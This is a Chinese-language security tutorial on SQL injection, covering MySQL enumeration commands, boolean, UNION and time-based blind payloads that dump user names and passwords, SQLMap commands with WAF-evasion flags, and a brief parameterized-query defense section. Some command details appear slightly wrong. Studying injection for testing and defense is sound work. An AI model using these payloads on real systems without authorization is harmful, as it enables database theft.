SQL 注入是 Web 应用常见安全漏洞,攻击者通过构造恶意 SQL 语句操控数据库。注入分类、检测流程及手动利用方法,介绍 SQLMap 工具使用技巧,并提供基于参数化查询等核心防御方案,帮助开发者理解风险并构建安全系统。
SQL 注入(SQL Injection)是发生在 Web 应用程序数据库层的安全漏洞,也是目前互联网上最常见且危害极大的安全威胁之一。该漏洞产生的主要原因是程序对用户输入数据的合法性缺乏有效的判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的恶意 SQL 语句。在管理员不知情的情况下,攻击者能够欺骗数据库服务器执行非授权的任意查询,从而获取敏感数据信息、修改或删除数据,甚至控制整个 Web 服务器。
SQL 注入常年稳居 OWASP Top 10 风险榜单前列,对网站、企业乃至国家安全构成严重威胁。因此,从开发、测试到上线的各个环节都必须对其进行严格防范。本文将详细介绍 SQL 注入的原理、分类、检测流程及防御方案。
SQL 注入是指攻击者通过把 SQL 命令插入到 Web 表单提交、域名输入或页面请求的查询字符串中,最终达到欺骗服务器执行恶意 SQL 命令的目的。对于 Web 应用程序而言,用户核心数据通常存储在关系型数据库中,如 MySQL、SQL Server、Oracle 等。通过 SQL 注入攻击,攻击者可以获取、修改、删除数据库信息,并通过提权来控制 Web 服务器。
SQL 注入由研究员 Rain Forest Puppy 发现,并于 1998 年对外发表文章《NT Web Technology Vulnerabilities》。其本质是攻击者通过构造特殊的 SQL 语句,入侵目标系统,致使后台数据库泄露数据的过程。
掌握数据库操作命令是进行 SQL 注入分析的基础。以下是常用的 MySQL 数据库操作命令:
| SQL 命令 | 作用 |
|---|---|
SHOW DATABASES; | 显示当前 MySQL 服务器的数据库列表 |
USE DBNAME; | 指定接下来要操作的数据库 |
SHOW TABLES; | 显示当前数据库的所有数据表 |
SHOW TABLE STATUS FROM DBNAME; | 显示该库中所有表的详细信息 |
SELECT VERSION(); | 查看数据库管理系统的版本 |
SELECT DATABASE(); | 查看当前使用的是哪个数据库 |
SELECT USER(); | 查看当前使用的数据库用户 |
SELECT @@DATADIR | 查看数据库的数据存储路径 |
SELECT @@BASEDIR | 查看数据库的安装路径 |
SELECT @@VERSION_COMPILE_OS | 查看操作系统的编译版本 |
在确认数据库结构后,通常需要进行数据表的查询与操作。常见的操作包括插入、查询和删除数据。例如,使用 INSERT INTO 添加记录,使用 SELECT 读取记录,使用 DELETE 移除记录。这些操作在正常业务逻辑中是合法的,但在注入场景下会被攻击者滥用。
标准的 SQL 注入渗透测试通常遵循以下流程:
布尔注入的核心在于闭合 SQL 语句,构造 OR 和 AND 逻辑语句,并注释掉多余的代码。通过观察页面返回内容是否与预期一致来判断条件真假。
admin' AND 1=1 -- :如果页面正常显示,说明注入点存在。admin' OR 1=1 -- :强制查询所有账号密码。admin' AND 1=2 -- :如果页面无内容或报错,说明条件为假。UNION 注入要求前后查询的项数和顺序必须一致。这是最直接的获取数据方式。
SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;
步骤:
'union select 1,2 -- ' 测试,逐步增加数字直到报错停止,确定列数。'union select 1,2,3 -- ' 确定哪一列可以回显数据。INFORMATION_SCHEMA 库。
'union select 1,table_name from INFORMATION_SCHEMA.tables -- ''union select version(),database() from INFORMATION_SCHEMA.tables -- ''union select user(),databases() from INFORMATION_SCHEMA.tables -- '注意:information_schema 数据库是 MySQL 自带的,提供了访问数据库元数据的方式,包括数据库名、表名、列数据类型、访问权限等基础信息。
在确定数据库名后,可以进一步查询具体的表结构和字段名。
'union select 1,column_name from INFORMATION_SCHEMA.columns where table_name = 'users' -- '
'union select NULL, user from users -- '
'union select NULL, password from users -- '
'union select user, password from users -- '
'union select NULL, GRANTEE from USER_PRIVILEGES -- '
当页面没有明显回显时,可以使用时间盲注。通过执行 SLEEP() 或 BENCHMARK() 函数,观察页面响应时间的变化来判断条件真假。
admin' AND SLEEP(5) -- :如果页面延迟 5 秒返回,说明注入成功。SQLMap 是目前最流行的自动化 SQL 注入工具,支持多种注入类型和绕过 WAF 的功能。
sqlmap -u "url":指定检测的网址。sqlmap -u "url" -p username --users:查看数据库用户信息。sqlmap -u "url" -p username -dbs:查看有多少数据库。采用 Fiddler、Burpsuite 或 Tamper 等代理工具拦截 POST 请求内容,将请求保存到 post.txt 文件中,并使用 -r 参数调用。
sqlmap -r post.txt --dbssqlmap -r post.txt --userssqlmap -r post.txt --all对于需要登录才能访问的页面,可以通过 Cookie 参数进行注入。
sqlmap -u "url" cookie="session_id=xxx" --dbs用于绕过或识别 Web 应用防火墙(WAF)、入侵检测系统(IDS/IPS)。
sqlmap -u "url" --dbms=mysql --skip-waf:绕过 WAF 防火墙。sqlmap -u "url" --dbms=mysql --skip-waf --random-agent:使用随机 HTTP 头部。sqlmap -u "url" --dbms=mysql --skip-waf --random-agent --mobile:模拟手机请求。sqlmap -u "url" --dbms=mysql --skip-waf --random-agent --mobile --level 3 risk=2:提高安全/危险等级。sqlmap -u "url" --dbms=mysql --skip-waf --random-agent --mobile --smart:智能模式(温和)。sqlmap -u "url" --dbms=mysql --skip-waf --random-agent --mobile --smart --offline:减少跟对方的交互。sqlmap -r /root/Desktop/post --tables -D "数据库名"
此命令可查看当前数据库的数据表。
为了有效防止 SQL 注入,开发者应采取以下措施:
PreparedStatement,在 PHP 中使用 PDO。SQL 注入作为一种经典且持久的 Web 安全威胁,理解其原理和防御机制对于开发人员和安全从业者至关重要。本文详细介绍了 SQL 注入的分类、检测流程、手动利用技巧以及自动化工具的使用,并重点强调了基于预编译语句的防御方案。在实际开发中,应始终遵循安全编码规范,从源头消除安全隐患,保障系统数据安全。
注:本文内容仅供网络安全学习与研究使用,请勿用于非法用途。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
在线格式化和美化您的 SQL 查询(它支持各种 SQL 方言)。 在线工具,SQL 美化和格式化在线工具,online
解析 INSERT 等受限 SQL,导出为 CSV、JSON、XML、YAML、HTML 表格(见页内语法说明)。 在线工具,SQL转CSV/JSON/XML在线工具,online
CSV 与 JSON/XML/HTML/TSV/SQL 等互转,单页多 Tab。 在线工具,CSV 工具包在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online